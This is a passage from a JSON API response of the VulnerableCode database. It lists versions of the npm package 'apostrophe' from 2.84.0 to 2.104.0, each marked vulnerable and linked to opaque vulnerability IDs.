ility":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.84.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268646?format=json","purl":"pkg:npm/apostrophe@2.84.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.84.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268647?format=json","purl":"pkg:npm/apostrophe@2.85.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.85.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268648?format=json","purl":"pkg:npm/apostrophe@2.86.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.86.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268649?format=json","purl":"pkg:npm/apostrophe@2.87.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.87.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268650?format=json","purl":"pkg:npm/apostrophe@2.88.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.88.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268651?format=json","purl":"pkg:npm/apostrophe@2.88.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.88.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268652?format=json","purl":"pkg:npm/apostrophe@2.89.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.89.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268653?format=json","purl":"pkg:npm/apostrophe@2.89.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.89.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268654?format=json","purl":"pkg:npm/apostrophe@2.90.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.90.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268655?format=json","purl":"pkg:npm/apostrophe@2.91.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.91.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268656?format=json","purl":"pkg:npm/apostrophe@2.91.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.91.1"},{"url":"http://public2.vulnerablecode.io/api/packages/78512?format=json","purl":"pkg:npm/apostrophe@2.92.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.92.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268657?format=json","purl":"pkg:npm/apostrophe@2.92.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.92.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268658?format=json","purl":"pkg:npm/apostrophe@2.93.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.93.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268659?format=json","purl":"pkg:npm/apostrophe@2.94.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.94.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268660?format=json","purl":"pkg:npm/apostrophe@2.94.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.94.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268661?format=json","purl":"pkg:npm/apostrophe@2.95.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.95.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268662?format=json","purl":"pkg:npm/apostrophe@2.95.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.95.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268663?format=json","purl":"pkg:npm/apostrophe@2.96.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.96.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268664?format=json","purl":"pkg:npm/apostrophe@2.96.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.96.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268665?format=json","purl":"pkg:npm/apostrophe@2.96.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.96.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268666?format=json","purl":"pkg:npm/apostrophe@2.97.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.97.0"},{"url":"http://public2.vulnerablecode.io/api/packages/78225?format=json","purl":"pkg:npm/apostrophe@2.97.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.97.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539422?format=json","purl":"pkg:npm/apostrophe@2.97.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.97.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539423?format=json","purl":"pkg:npm/apostrophe@2.98.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.98.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539424?format=json","purl":"pkg:npm/apostrophe@2.98.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.98.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539425?format=json","purl":"pkg:npm/apostrophe@2.99.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.99.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539426?format=json","purl":"pkg:npm/apostrophe@2.100.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.100.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539427?format=json","purl":"pkg:npm/apostrophe@2.100.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.100.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539428?format=json","purl":"pkg:npm/apostrophe@2.100.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.100.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539429?format=json","purl":"pkg:npm/apostrophe@2.101.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.101.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539430?format=json","purl":"pkg:npm/apostrophe@2.101.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.101.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539431?format=json","purl":"pkg:npm/apostrophe@2.102.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.102.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539432?format=json","purl":"pkg:npm/apostrophe@2.102.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.102.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539433?format=json","purl":"pkg:npm/apostrophe@2.102.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.102.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539434?format=json","purl":"pkg:npm/apostrophe@2.102.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.102.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539435?format=json","purl":"pkg:npm/apostrophe@2.102.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.102.4"},{"url":"http://public2.vulnerablecode.io/api/packages/539436?format=json","purl":"pkg:npm/apostrophe@2.102.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.102.5"},{"url":"http://public2.vulnerablecode.io/api/packages/539437?format=json","purl":"pkg:npm/apostrophe@2.103.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.103.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539438?format=json","purl":"pkg:npm/apostrophe@2.103.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.103.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539439?format=json","purl":"pkg:npm/apostrophe@2.104.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerabilit